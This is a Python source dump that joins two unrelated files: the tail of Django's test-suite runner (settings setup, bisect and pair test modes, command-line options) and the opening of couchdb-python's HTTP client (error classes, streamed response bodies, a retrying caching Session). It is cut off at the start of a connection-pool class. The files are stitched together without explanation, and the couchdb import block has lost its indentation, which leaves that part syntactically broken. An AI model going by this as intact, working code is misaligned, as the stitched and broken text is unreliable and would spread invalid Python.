# Create a specific subdirectory for the duration of the test suite.
TMPDIR = tempfile.mkdtemp(prefix='django_')
# Set the TMPDIR environment variable in addition to tempfile.tempdir
# so that children processes inherit it.
tempfile.tempdir = os.environ['TMPDIR'] = TMPDIR

# Removing the temporary TMPDIR.
atexit.register(shutil.rmtree, TMPDIR)

# Test-app subdirectories that are not themselves test apps.
SUBDIRS_TO_SKIP = [
    'data',
    'import_error_package',
    'test_runner_apps',
]

ALWAYS_INSTALLED_APPS = [
    'django.contrib.contenttypes',
    'django.contrib.auth',
    'django.contrib.sites',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.admin.apps.SimpleAdminConfig',
    'django.contrib.staticfiles',
]

ALWAYS_MIDDLEWARE = [
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
]

# Need to add the associated contrib app to INSTALLED_APPS in some cases to
# avoid "RuntimeError: Model class X doesn't declare an explicit app_label
# and isn't in an application in INSTALLED_APPS."
CONTRIB_TESTS_TO_APPS = {
    'flatpages_tests': 'django.contrib.flatpages',
    'redirects_tests': 'django.contrib.redirects',
}
def get_test_modules():
    """Discover test app modules as (modpath, name) pairs.

    Scans RUNTESTS_DIR (and gis_tests when GIS is enabled) for packages,
    skipping SUBDIRS_TO_SKIP. When GIS is disabled, 'gis_tests' is added
    to the module-level skip list as a side effect.
    """
    discovery_paths = [(None, RUNTESTS_DIR)]
    if connection.features.gis_enabled:
        # GIS tests are in nested apps
        discovery_paths.append(('gis_tests', os.path.join(RUNTESTS_DIR, 'gis_tests')))
    else:
        SUBDIRS_TO_SKIP.append('gis_tests')
    modules = []
    for modpath, dirpath in discovery_paths:
        for entry in os.scandir(dirpath):
            name = entry.name
            if '.' in name or os.path.basename(name) in SUBDIRS_TO_SKIP:
                continue
            if entry.is_file():
                continue
            if os.path.exists(os.path.join(entry.path, '__init__.py')):
                modules.append((modpath, name))
    return modules
def get_installed():
    """Return the dotted names of all currently installed Django apps."""
    return [app_config.name for app_config in apps.get_app_configs()]
def setup(verbosity, test_labels, parallel, start_at, start_after):
    """Configure Django settings for the test run and install test apps.

    Returns a dict of the original settings values so teardown() can
    restore them afterwards. Exits the process when gis_tests is requested
    without a GIS-capable database backend.
    """
    # Reduce the given test labels to just the app module path.
    test_labels_set = set()
    for label in test_labels:
        bits = label.split('.')[:1]
        test_labels_set.add('.'.join(bits))
    if verbosity >= 1:
        msg = "Testing against Django installed in '%s'" % os.path.dirname(django.__file__)
        max_parallel = default_test_processes() if parallel == 0 else parallel
        if max_parallel > 1:
            msg += " with up to %d processes" % max_parallel
        print(msg)
    # Force declaring available_apps in TransactionTestCase for faster tests.
    def no_available_apps(self):
        raise Exception("Please define available_apps in TransactionTestCase "
                        "and its subclasses.")
    TransactionTestCase.available_apps = property(no_available_apps)
    TestCase.available_apps = None
    # Snapshot the settings we are about to override.
    state = {
        'INSTALLED_APPS': settings.INSTALLED_APPS,
        'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
        'TEMPLATES': settings.TEMPLATES,
        'LANGUAGE_CODE': settings.LANGUAGE_CODE,
        'STATIC_URL': settings.STATIC_URL,
        'STATIC_ROOT': settings.STATIC_ROOT,
        'MIDDLEWARE': settings.MIDDLEWARE,
    }
    # Redirect some settings for the duration of these tests.
    settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
    settings.ROOT_URLCONF = 'urls'
    settings.STATIC_URL = '/static/'
    settings.STATIC_ROOT = os.path.join(TMPDIR, 'static')
    settings.TEMPLATES = [{
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATE_DIR],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    }]
    settings.LANGUAGE_CODE = 'en'
    settings.SITE_ID = 1
    settings.MIDDLEWARE = ALWAYS_MIDDLEWARE
    settings.MIGRATION_MODULES = {
        # This lets us skip creating migrations for the test models as many of
        # them depend on one of the following contrib applications.
        'auth': None,
        'contenttypes': None,
        'sessions': None,
    }
    log_config = copy.deepcopy(DEFAULT_LOGGING)
    # Filter out non-error logging so we don't have to capture it in lots of
    # tests.
    log_config['loggers']['django']['level'] = 'ERROR'
    settings.LOGGING = log_config
    settings.SILENCED_SYSTEM_CHECKS = [
        'fields.W342',  # ForeignKey(unique=True) -> OneToOneField
        'fields.W903',  # NullBooleanField deprecated.
    ]
    # Load all the ALWAYS_INSTALLED_APPS.
    django.setup()
    # It would be nice to put this validation earlier but it must come after
    # django.setup() so that connection.features.gis_enabled can be accessed
    # without raising AppRegistryNotReady when running gis_tests in isolation
    # on some backends (e.g. PostGIS).
    if 'gis_tests' in test_labels_set and not connection.features.gis_enabled:
        print('Aborting: A GIS database backend is required to run gis_tests.')
        sys.exit(1)
    def _module_match_label(module_label, label):
        # Exact or ancestor match.
        return module_label == label or module_label.startswith(label + '.')
    # Load all the test model apps.
    test_modules = get_test_modules()
    found_start = not (start_at or start_after)
    installed_app_names = set(get_installed())
    for modpath, module_name in test_modules:
        if modpath:
            module_label = modpath + '.' + module_name
        else:
            module_label = module_name
        # Honor --start-at / --start-after by skipping modules before the
        # requested starting point.
        if not found_start:
            if start_at and _module_match_label(module_label, start_at):
                found_start = True
            elif start_after and _module_match_label(module_label, start_after):
                found_start = True
                continue
            else:
                continue
        # if the module (or an ancestor) was named on the command line, or
        # no modules were named (i.e., run all), import
        # this module and add it to INSTALLED_APPS.
        module_found_in_labels = not test_labels or any(
            _module_match_label(module_label, label) for label in test_labels_set
        )
        if module_name in CONTRIB_TESTS_TO_APPS and module_found_in_labels:
            settings.INSTALLED_APPS.append(CONTRIB_TESTS_TO_APPS[module_name])
        if module_found_in_labels and module_label not in installed_app_names:
            if verbosity >= 2:
                print("Importing application %s" % module_name)
            settings.INSTALLED_APPS.append(module_label)
    # Add contrib.gis to INSTALLED_APPS if needed (rather than requiring
    # @override_settings(INSTALLED_APPS=...) on all test cases.
    gis = 'django.contrib.gis'
    if connection.features.gis_enabled and gis not in settings.INSTALLED_APPS:
        if verbosity >= 2:
            print("Importing application %s" % gis)
        settings.INSTALLED_APPS.append(gis)
    apps.set_installed_apps(settings.INSTALLED_APPS)
    return state
def teardown(state):
    """Restore the settings snapshot produced by setup()."""
    # Restore the old settings.
    for key, value in state.items():
        setattr(settings, key, value)
    # Discard the multiprocessing.util finalizer that tries to remove a
    # temporary directory that's already removed by this script's
    # atexit.register(shutil.rmtree, TMPDIR) handler. Prevents
    # FileNotFoundError at the end of a test run (#27890).
    # NOTE(review): relies on a private multiprocessing API and a fixed
    # (-100, 0) registry key.
    from multiprocessing.util import _finalizer_registry
    _finalizer_registry.pop((-100, 0), None)
def actual_test_processes(parallel):
    """Resolve the effective number of parallel test processes.

    A non-zero value is used as-is; 0 means auto-detect, which is only
    allowed when every configured database supports cloning.
    """
    if parallel != 0:
        return parallel
    # This doesn't work before django.setup() on some databases.
    if all(conn.features.can_clone_databases for conn in connections.all()):
        return default_test_processes()
    return 1
class ActionSelenium(argparse.Action):
    """
    Validate the comma-separated list of requested browsers.
    """
    def __call__(self, parser, namespace, values, option_string=None):
        # Each name must resolve to an importable Selenium webdriver;
        # otherwise argparse reports the offending browser name.
        browsers = values.split(',')
        for browser in browsers:
            try:
                SeleniumTestCaseBase.import_webdriver(browser)
            except ImportError:
                raise argparse.ArgumentError(self, "Selenium browser specification '%s' is not valid." % browser)
        setattr(namespace, self.dest, browsers)
def django_tests(verbosity, interactive, failfast, keepdb, reverse,
                 test_labels, debug_sql, parallel, tags, exclude_tags,
                 test_name_patterns, start_at, start_after, pdb, buffer):
    """Run the requested tests and return the number of failures."""
    state = setup(verbosity, test_labels, parallel, start_at, start_after)
    extra_tests = []
    # Run the test suite, including the extra validation tests.
    if not hasattr(settings, 'TEST_RUNNER'):
        settings.TEST_RUNNER = 'django.test.runner.DiscoverRunner'
    TestRunner = get_runner(settings)
    test_runner = TestRunner(
        verbosity=verbosity,
        interactive=interactive,
        failfast=failfast,
        keepdb=keepdb,
        reverse=reverse,
        debug_sql=debug_sql,
        parallel=actual_test_processes(parallel),
        tags=tags,
        exclude_tags=exclude_tags,
        test_name_patterns=test_name_patterns,
        pdb=pdb,
        buffer=buffer,
    )
    # With no labels, run every installed app's tests.
    failures = test_runner.run_tests(
        test_labels or get_installed(),
        extra_tests=extra_tests,
    )
    teardown(state)
    return failures
def get_subprocess_args(options):
    """Translate parsed options back into argv for a child test run."""
    args = [sys.executable, __file__, '--settings=%s' % options.settings]
    if options.failfast:
        args.append('--failfast')
    if options.verbosity:
        args.append('--verbosity=%s' % options.verbosity)
    if not options.interactive:
        args.append('--noinput')
    if options.tags:
        args.append('--tag=%s' % options.tags)
    if options.exclude_tags:
        args.append('--exclude_tag=%s' % options.exclude_tags)
    return args
def bisect_tests(bisection_label, options, test_labels, parallel, start_at, start_after):
    """Binary-search the test suite for a test that breaks bisection_label.

    Repeatedly splits the label list in half, running each half (plus the
    bisection label) in a child process, and keeps the failing half until
    a single culprit remains or the failure pattern is ambiguous.
    """
    state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
    test_labels = test_labels or get_installed()
    print('***** Bisecting test suite: %s' % ' '.join(test_labels))
    # Make sure the bisection point isn't in the test list
    # Also remove tests that need to be run in specific combinations
    for label in [bisection_label, 'model_inheritance_same_model_name']:
        try:
            test_labels.remove(label)
        except ValueError:
            pass
    subprocess_args = get_subprocess_args(options)
    iteration = 1
    while len(test_labels) > 1:
        midpoint = len(test_labels) // 2
        test_labels_a = test_labels[:midpoint] + [bisection_label]
        test_labels_b = test_labels[midpoint:] + [bisection_label]
        print('***** Pass %da: Running the first half of the test suite' % iteration)
        print('***** Test labels: %s' % ' '.join(test_labels_a))
        failures_a = subprocess.run(subprocess_args + test_labels_a)
        print('***** Pass %db: Running the second half of the test suite' % iteration)
        print('***** Test labels: %s' % ' '.join(test_labels_b))
        print('')
        failures_b = subprocess.run(subprocess_args + test_labels_b)
        # A non-zero returncode marks the failing half; drop the appended
        # bisection label ([:-1]) before recursing into it.
        if failures_a.returncode and not failures_b.returncode:
            print("***** Problem found in first half. Bisecting again...")
            iteration += 1
            test_labels = test_labels_a[:-1]
        elif failures_b.returncode and not failures_a.returncode:
            print("***** Problem found in second half. Bisecting again...")
            iteration += 1
            test_labels = test_labels_b[:-1]
        elif failures_a.returncode and failures_b.returncode:
            print("***** Multiple sources of failure found")
            break
        else:
            print("***** No source of failure found... try pair execution (--pair)")
            break
    if len(test_labels) == 1:
        print("***** Source of error: %s" % test_labels[0])
    teardown(state)
def paired_tests(paired_test, options, test_labels, parallel, start_at, start_after):
    """Run each test label together with paired_test to find a bad pairing."""
    state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
    test_labels = test_labels or get_installed()
    print('***** Trying paired execution')
    # Make sure the constant member of the pair isn't in the test list
    # Also remove tests that need to be run in specific combinations
    for label in [paired_test, 'model_inheritance_same_model_name']:
        try:
            test_labels.remove(label)
        except ValueError:
            pass
    subprocess_args = get_subprocess_args(options)
    for i, label in enumerate(test_labels):
        print('***** %d of %d: Check test pairing with %s' % (
            i + 1, len(test_labels), label))
        # subprocess.call returns the child's exit code; non-zero = failure.
        failures = subprocess.call(subprocess_args + [label, paired_test])
        if failures:
            print('***** Found problem pair with %s' % label)
            return
    print('***** No problem pair found')
    teardown(state)
if __name__ == "__main__":
    # Command-line entry point: parse options, normalize them, then dispatch
    # to bisect_tests / paired_tests / django_tests.
    parser = argparse.ArgumentParser(description="Run the Django test suite.")
    parser.add_argument(
        'modules', nargs='*', metavar='module',
        help='Optional path(s) to test modules; e.g. "i18n" or '
             '"i18n.tests.TranslationTests.test_lazy_objects".',
    )
    parser.add_argument(
        '-v', '--verbosity', default=1, type=int, choices=[0, 1, 2, 3],
        help='Verbosity level; 0=minimal output, 1=normal output, 2=all output',
    )
    parser.add_argument(
        '--noinput', action='store_false', dest='interactive',
        help='Tells Django to NOT prompt the user for input of any kind.',
    )
    parser.add_argument(
        '--failfast', action='store_true',
        help='Tells Django to stop running the test suite after first failed test.',
    )
    parser.add_argument(
        '--keepdb', action='store_true',
        help='Tells Django to preserve the test database between runs.',
    )
    parser.add_argument(
        '--settings',
        help='Python path to settings module, e.g. "myproject.settings". If '
             'this isn\'t provided, either the DJANGO_SETTINGS_MODULE '
             'environment variable or "test_sqlite" will be used.',
    )
    parser.add_argument(
        '--bisect',
        help='Bisect the test suite to discover a test that causes a test '
             'failure when combined with the named test.',
    )
    parser.add_argument(
        '--pair',
        help='Run the test suite in pairs with the named test to find problem pairs.',
    )
    parser.add_argument(
        '--reverse', action='store_true',
        help='Sort test suites and test cases in opposite order to debug '
             'test side effects not apparent with normal execution lineup.',
    )
    parser.add_argument(
        '--selenium', action=ActionSelenium, metavar='BROWSERS',
        help='A comma-separated list of browsers to run the Selenium tests against.',
    )
    parser.add_argument(
        '--headless', action='store_true',
        help='Run selenium tests in headless mode, if the browser supports the option.',
    )
    parser.add_argument(
        '--selenium-hub',
        help='A URL for a selenium hub instance to use in combination with --selenium.',
    )
    parser.add_argument(
        '--external-host', default=socket.gethostname(),
        help='The external host that can be reached by the selenium hub instance when running Selenium '
             'tests via Selenium Hub.',
    )
    parser.add_argument(
        '--debug-sql', action='store_true',
        help='Turn on the SQL query logger within tests.',
    )
    parser.add_argument(
        '--parallel', nargs='?', default=0, type=int,
        const=default_test_processes(), metavar='N',
        help='Run tests using up to N parallel processes.',
    )
    parser.add_argument(
        '--tag', dest='tags', action='append',
        help='Run only tests with the specified tags. Can be used multiple times.',
    )
    parser.add_argument(
        '--exclude-tag', dest='exclude_tags', action='append',
        help='Do not run tests with the specified tag. Can be used multiple times.',
    )
    parser.add_argument(
        '--start-after', dest='start_after',
        help='Run tests starting after the specified top-level module.',
    )
    parser.add_argument(
        '--start-at', dest='start_at',
        help='Run tests starting at the specified top-level module.',
    )
    parser.add_argument(
        '--pdb', action='store_true',
        help='Runs the PDB debugger on error or failure.'
    )
    parser.add_argument(
        '-b', '--buffer', action='store_true',
        help='Discard output of passing tests.',
    )
    # unittest's -k pattern option requires Python 3.7+.
    if PY37:
        parser.add_argument(
            '-k', dest='test_name_patterns', action='append',
            help=(
                'Only run test methods and classes matching test name pattern. '
                'Same as unittest -k option. Can be used multiple times.'
            ),
        )
    options = parser.parse_args()

    # Validate the Selenium-related option combinations.
    using_selenium_hub = options.selenium and options.selenium_hub
    if options.selenium_hub and not options.selenium:
        parser.error('--selenium-hub and --external-host require --selenium to be used.')
    if using_selenium_hub and not options.external_host:
        parser.error('--selenium-hub and --external-host must be used together.')

    # Allow including a trailing slash on app_labels for tab completion convenience
    options.modules = [os.path.normpath(labels) for labels in options.modules]

    mutually_exclusive_options = [options.start_at, options.start_after, options.modules]
    enabled_module_options = [bool(option) for option in mutually_exclusive_options].count(True)
    if enabled_module_options > 1:
        print('Aborting: --start-at, --start-after, and test labels are mutually exclusive.')
        sys.exit(1)
    for opt_name in ['start_at', 'start_after']:
        opt_val = getattr(options, opt_name)
        if opt_val:
            if '.' in opt_val:
                print('Aborting: --%s must be a top-level module.' % opt_name.replace('_', '-'))
                sys.exit(1)
            setattr(options, opt_name, os.path.normpath(opt_val))

    # Resolve the settings module (flag > environment > test_sqlite default).
    if options.settings:
        os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
    else:
        os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_sqlite')
        options.settings = os.environ['DJANGO_SETTINGS_MODULE']

    if options.selenium:
        # Selenium tests are tag-gated; force the 'selenium' tag on.
        if not options.tags:
            options.tags = ['selenium']
        elif 'selenium' not in options.tags:
            options.tags.append('selenium')
        if options.selenium_hub:
            SeleniumTestCaseBase.selenium_hub = options.selenium_hub
            SeleniumTestCaseBase.external_host = options.external_host
        SeleniumTestCaseBase.headless = options.headless
        SeleniumTestCaseBase.browsers = options.selenium

    if options.bisect:
        bisect_tests(
            options.bisect, options, options.modules, options.parallel,
            options.start_at, options.start_after,
        )
    elif options.pair:
        paired_tests(
            options.pair, options, options.modules, options.parallel,
            options.start_at, options.start_after,
        )
    else:
        failures = django_tests(
            options.verbosity, options.interactive, options.failfast,
            options.keepdb, options.reverse, options.modules,
            options.debug_sql, options.parallel, options.tags,
            options.exclude_tags,
            getattr(options, 'test_name_patterns', None),
            options.start_at, options.start_after, options.pdb, options.buffer,
        )
        if failures:
            sys.exit(1)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2009 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
"""Simple HTTP client implementation based on the ``httplib`` module in the
standard library.
"""
from base64 import b64encode
from datetime import datetime
import errno
from httplib import BadStatusLine, HTTPConnection, HTTPSConnection
import socket
import time
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import sys
try:
from threading import Lock
except ImportError:
from dummy_threading import Lock
import urllib
from urlparse import urlsplit, urlunsplit
from email.Utils import parsedate
from couchdb import json
__all__ = ['HTTPError', 'PreconditionFailed', 'ResourceNotFound',
'ResourceConflict', 'ServerError', 'Unauthorized', 'RedirectLimit',
'Session', 'Resource']
__docformat__ = 'restructuredtext en'
# Compatibility shim: Python < 2.6 httplib connections have no timeout
# support, so wrap them with a connect() that applies one. (Python 2 only:
# uses the print statement and old except/raise syntax.)
if sys.version < '2.6':
    class TimeoutMixin:
        """Helper mixin to add timeout before socket connection"""

        # taken from original python2.5 httplib source code with timeout setting added
        def connect(self):
            """Connect to the host and port specified in __init__."""
            msg = "getaddrinfo returns an empty list"
            for res in socket.getaddrinfo(self.host, self.port, 0,
                                          socket.SOCK_STREAM):
                af, socktype, proto, canonname, sa = res
                try:
                    self.sock = socket.socket(af, socktype, proto)
                    if self.debuglevel > 0:
                        print "connect: (%s, %s)" % (self.host, self.port)
                    # setting socket timeout
                    self.sock.settimeout(self.timeout)
                    self.sock.connect(sa)
                except socket.error, msg:
                    if self.debuglevel > 0:
                        print 'connect fail:', (self.host, self.port)
                    if self.sock:
                        self.sock.close()
                    self.sock = None
                    continue
                break
            if not self.sock:
                raise socket.error, msg

    # Shadow the imported connection classes with timeout-aware subclasses;
    # the timeout keyword is popped before delegating to the originals.
    _HTTPConnection = HTTPConnection
    _HTTPSConnection = HTTPSConnection

    class HTTPConnection(TimeoutMixin, _HTTPConnection):
        def __init__(self, *a, **k):
            timeout = k.pop('timeout', None)
            _HTTPConnection.__init__(self, *a, **k)
            self.timeout = timeout

    class HTTPSConnection(TimeoutMixin, _HTTPSConnection):
        def __init__(self, *a, **k):
            timeout = k.pop('timeout', None)
            _HTTPSConnection.__init__(self, *a, **k)
            self.timeout = timeout
# Compatibility shim for Python < 2.7: send headers and body together so a
# request doesn't trigger Nagle's algorithm (one packet for headers, one for
# the body).
if sys.version < '2.7':
    from httplib import CannotSendHeader, _CS_REQ_STARTED, _CS_REQ_SENT

    class NagleMixin:
        """
        Mixin to upgrade httplib connection types so headers and body can be
        sent at the same time to avoid triggering Nagle's algorithm.

        Based on code originally copied from Python 2.7's httplib module.
        """
        def endheaders(self, message_body=None):
            # Name-mangled access to the base class's private __state attribute.
            if self.__dict__['_HTTPConnection__state'] == _CS_REQ_STARTED:
                self.__dict__['_HTTPConnection__state'] = _CS_REQ_SENT
            else:
                raise CannotSendHeader()
            self._send_output(message_body)

        def _send_output(self, message_body=None):
            # Terminate the header block, then append a string body so both go
            # out in a single send(); non-string bodies are sent separately.
            self._buffer.extend(("", ""))
            msg = "\r\n".join(self._buffer)
            del self._buffer[:]
            if isinstance(message_body, str):
                msg += message_body
                message_body = None
            self.send(msg)
            if message_body is not None:
                self.send(message_body)

    class HTTPConnection(NagleMixin, HTTPConnection):
        pass

    class HTTPSConnection(NagleMixin, HTTPSConnection):
        pass
class HTTPError(Exception):
    """Common base for exceptions raised for HTTP responses with a status
    code of 400 or higher."""
class PreconditionFailed(HTTPError):
    """Raised when the server answers a request with HTTP 412
    (precondition failed)."""
class ResourceNotFound(HTTPError):
    """Raised when the server answers a request with HTTP 404
    (not found)."""
class ResourceConflict(HTTPError):
    """Raised when the server answers a request with HTTP 409
    (conflict)."""
class ServerError(HTTPError):
    """Raised for any HTTP error status that has no more specific
    exception class of its own."""
class Unauthorized(HTTPError):
    """Raised when the server demands authentication credentials and none
    were supplied, or the supplied ones were rejected."""
class RedirectLimit(Exception):
    """Raised when a request bounces through more redirects than the
    configured maximum allows."""
# Read granularity (8 KiB) used when draining or streaming response bodies.
CHUNK_SIZE = 1024 * 8
class ResponseBody(object):
    """Minimal file-like wrapper over an httplib response.

    Used for large or chunked response bodies so they are streamed instead
    of buffered in memory; *callback* is invoked exactly once, after the
    response has been fully consumed, to return the connection to the pool.
    """
    def __init__(self, resp, callback):
        self.resp = resp
        self.callback = callback
    def read(self, size=None):
        # NOTE(review): `bytes` shadows the builtin of the same name.
        bytes = self.resp.read(size)
        # A short read (or size=None, meaning read-to-end) signals the body
        # is exhausted: drain and release the connection.
        if size is None or len(bytes) < size:
            self.close()
        return bytes
    def close(self):
        # Drain whatever is left so the connection can be reused, then fire
        # the release callback at most once.
        while not self.resp.isclosed():
            self.resp.read(CHUNK_SIZE)
        if self.callback:
            self.callback()
            self.callback = None
    def iterchunks(self):
        """Yield the individual lines of each transfer-encoding chunk.

        Presumably intended for CouchDB's line-oriented continuous
        ``_changes`` feed — TODO confirm; only valid for chunked responses.
        """
        assert self.resp.msg.get('transfer-encoding') == 'chunked'
        while True:
            if self.resp.isclosed():
                break
            # Chunk header: hexadecimal payload length followed by CRLF.
            chunksz = int(self.resp.fp.readline().strip(), 16)
            if not chunksz:
                # A zero-length chunk terminates the body.
                self.resp.fp.read(2) #crlf
                self.resp.close()
                self.callback()
                break
            chunk = self.resp.fp.read(chunksz)
            for ln in chunk.splitlines():
                yield ln
            self.resp.fp.read(2) #crlf
# errno values treated as transient failures: requests failing with one of
# these are retried according to Session's retry_delays schedule.
RETRYABLE_ERRORS = frozenset([
    errno.EPIPE, errno.ETIMEDOUT,
    errno.ECONNRESET, errno.ECONNREFUSED, errno.ECONNABORTED,
    errno.EHOSTDOWN, errno.EHOSTUNREACH,
    errno.ENETRESET, errno.ENETUNREACH, errno.ENETDOWN
])
class Session(object):
    """HTTP client session: connection pooling, response caching with
    ETag/304 revalidation, retries on transient socket errors, and
    redirect following.

    NOTE(review): this module is Python 2 only (``basestring``, ``unicode``,
    ``except E, e`` syntax, ``sys.maxint``, ``iterator.next()``).
    """
    def __init__(self, cache=None, timeout=None, max_redirects=5,
                 retry_delays=[0], retryable_errors=RETRYABLE_ERRORS):
        """Initialize an HTTP client session.
        :param cache: an instance with a dict-like interface or None to allow
                      Session to create a dict for caching.
        :param timeout: socket timeout in number of seconds, or `None` for no
                        timeout (the default)
        :param max_redirects: number of redirects followed per request before
                              RedirectLimit is raised.
        :param retry_delays: list of request retry delays.
        :param retryable_errors: errno values that trigger a retry.
        """
        from couchdb import __version__ as VERSION
        self.user_agent = 'CouchDB-Python/%s' % VERSION
        # XXX We accept a `cache` dict arg, but the ref gets overwritten later
        # during cache cleanup. Do we remove the cache arg (does using a shared
        # Session instance cover the same use cases?) or fix the cache cleanup?
        # For now, let's just assign the dict to the Cache instance to retain
        # current behaviour.
        if cache is not None:
            cache_by_url = cache
            cache = Cache()
            cache.by_url = cache_by_url
        else:
            cache = Cache()
        self.cache = cache
        self.max_redirects = max_redirects
        # Map of url -> permanently-redirected (301) url, consulted up front.
        self.perm_redirects = {}
        self.connection_pool = ConnectionPool(timeout)
        # The mutable default [0] is safe: it is copied here, never mutated.
        self.retry_delays = list(retry_delays) # We don't want this changing on us.
        self.retryable_errors = set(retryable_errors)
    def request(self, method, url, body=None, headers=None, credentials=None,
                num_redirects=0):
        """Perform one HTTP request, returning ``(status, msg, data)``.

        ``msg`` is the response header mapping; ``data`` is a file-like
        object or None. Raises the HTTPError subclasses above for status
        codes >= 400.
        """
        if url in self.perm_redirects:
            url = self.perm_redirects[url]
        method = method.upper()
        if headers is None:
            headers = {}
        headers.setdefault('Accept', 'application/json')
        headers['User-Agent'] = self.user_agent
        # Revalidate a cached GET/HEAD response via If-None-Match.
        cached_resp = None
        if method in ('GET', 'HEAD'):
            cached_resp = self.cache.get(url)
            if cached_resp is not None:
                etag = cached_resp[1].get('etag')
                if etag:
                    headers['If-None-Match'] = etag
        # Non-string, non-file bodies are JSON-encoded.
        if (body is not None and not isinstance(body, basestring) and
                not hasattr(body, 'read')):
            body = json.encode(body)
            if isinstance(body, unicode):
                body = body.encode('utf-8')
            headers.setdefault('Content-Type', 'application/json')
        if body is None:
            headers.setdefault('Content-Length', '0')
        elif isinstance(body, basestring):
            headers.setdefault('Content-Length', str(len(body)))
        else:
            # File-like body of unknown length: use chunked transfer coding.
            headers['Transfer-Encoding'] = 'chunked'
        authorization = basic_auth(credentials)
        if authorization:
            headers['Authorization'] = authorization
        # Request line carries only path + query, never scheme/host.
        path_query = urlunsplit(('', '') + urlsplit(url)[2:4] + ('',))
        conn = self.connection_pool.get(url)
        def _try_request_with_retries(retries):
            # Retry _try_request for the configured delay schedule, but only
            # for errno values classified as transient.
            while True:
                try:
                    return _try_request()
                except socket.error, e:
                    ecode = e.args[0]
                    if ecode not in self.retryable_errors:
                        raise
                    try:
                        delay = retries.next()
                    except StopIteration:
                        # No more retries, raise last socket error.
                        raise e
                    time.sleep(delay)
                    conn.close()
        def _try_request():
            # Send one request on `conn` and return the httplib response.
            try:
                conn.putrequest(method, path_query, skip_accept_encoding=True)
                for header in headers:
                    conn.putheader(header, headers[header])
                if body is None:
                    conn.endheaders()
                else:
                    if isinstance(body, str):
                        conn.endheaders(body)
                    else: # assume a file-like object and send in chunks
                        conn.endheaders()
                        while 1:
                            chunk = body.read(CHUNK_SIZE)
                            if not chunk:
                                break
                            conn.send(('%x\r\n' % len(chunk)) + chunk + '\r\n')
                        conn.send('0\r\n\r\n')
                return conn.getresponse()
            except BadStatusLine, e:
                # httplib raises a BadStatusLine when it cannot read the status
                # line saying, "Presumably, the server closed the connection
                # before sending a valid response."
                # Raise as ECONNRESET to simplify retry logic.
                if e.line == '' or e.line == "''":
                    raise socket.error(errno.ECONNRESET)
                else:
                    raise
        resp = _try_request_with_retries(iter(self.retry_delays))
        status = resp.status
        # Handle conditional response
        if status == 304 and method in ('GET', 'HEAD'):
            resp.read()
            self.connection_pool.release(url, conn)
            # Serve the previously cached body instead of the empty 304.
            status, msg, data = cached_resp
            if data is not None:
                data = StringIO(data)
            return status, msg, data
        elif cached_resp:
            # Cached entry is stale (server did not answer 304): drop it.
            self.cache.remove(url)
        # Handle redirects
        if status == 303 or \
                method in ('GET', 'HEAD') and status in (301, 302, 307):
            resp.read()
            self.connection_pool.release(url, conn)
            if num_redirects > self.max_redirects:
                raise RedirectLimit('Redirection limit exceeded')
            location = resp.getheader('location')
            if status == 301:
                # Remember permanent redirects for future requests.
                self.perm_redirects[url] = location
            elif status == 303:
                # 303 See Other: re-fetch the target with GET.
                method = 'GET'
            return self.request(method, location, body, headers,
                                num_redirects=num_redirects + 1)
        data = None
        streamed = False
        # Read the full response for empty responses so that the connection is
        # in good state for the next request
        if method == 'HEAD' or resp.getheader('content-length') == '0' or \
                status < 200 or status in (204, 304):
            resp.read()
            self.connection_pool.release(url, conn)
        # Buffer small non-JSON response bodies
        elif int(resp.getheader('content-length', sys.maxint)) < CHUNK_SIZE:
            data = resp.read()
            self.connection_pool.release(url, conn)
        # For large or chunked response bodies, do not buffer the full body,
        # and instead return a minimal file-like object
        else:
            data = ResponseBody(resp,
                                lambda: self.connection_pool.release(url, conn))
            streamed = True
        # Handle errors
        if status >= 400:
            ctype = resp.getheader('content-type')
            # NOTE(review): `ctype` is None when the server omits
            # Content-Type, making the `in` test below raise TypeError; and
            # when the error body was large enough to be streamed, `data` is
            # a ResponseBody, which json.decode cannot handle — confirm.
            if data is not None and 'application/json' in ctype:
                data = json.decode(data)
                error = data.get('error'), data.get('reason')
            elif method != 'HEAD':
                error = resp.read()
                self.connection_pool.release(url, conn)
            else:
                # Body of a HEAD response would be empty anyway
                error = ''
            if status == 401:
                raise Unauthorized(error)
            elif status == 404:
                raise ResourceNotFound(error)
            elif status == 409:
                raise ResourceConflict(error)
            elif status == 412:
                raise PreconditionFailed(error)
            else:
                raise ServerError((status, error))
        # Store cachable responses
        if not streamed and method == 'GET' and 'etag' in resp.msg:
            self.cache.put(url, (status, resp.msg, data))
        if not streamed and data is not None:
            data = StringIO(data)
        return status, resp.msg, data
def cache_sort(i):
    """Sort key for cache entries: the response's Date header as a datetime."""
    timestamp = time.mktime(parsedate(i[1][1]['Date']))
    return datetime.fromtimestamp(timestamp)
class Cache(object):
    """In-memory cache of responses keyed by URL."""
    # Rough bounds chosen to limit memory use: once more than max_size
    # entries accumulate, prune down to the keep_size most recent ones.
    keep_size, max_size = 10, 75
    def __init__(self):
        self.by_url = {}
    def get(self, url):
        return self.by_url.get(url)
    def put(self, url, response):
        self.by_url[url] = response
        if len(self.by_url) > self.max_size:
            self._clean()
    def remove(self, url):
        self.by_url.pop(url, None)
    def _clean(self):
        # Keep only the entries carrying the newest Date headers.
        newest = sorted(self.by_url.iteritems(), key=cache_sort)
        self.by_url = dict(newest[-self.keep_size:])
class ConnectionPool(object):
    """Pool of reusable HTTP(S) connections, keyed by (scheme, host) so a
    connection is only ever reused against the server it was opened for."""
    def __init__(self, timeout):
        self.timeout = timeout
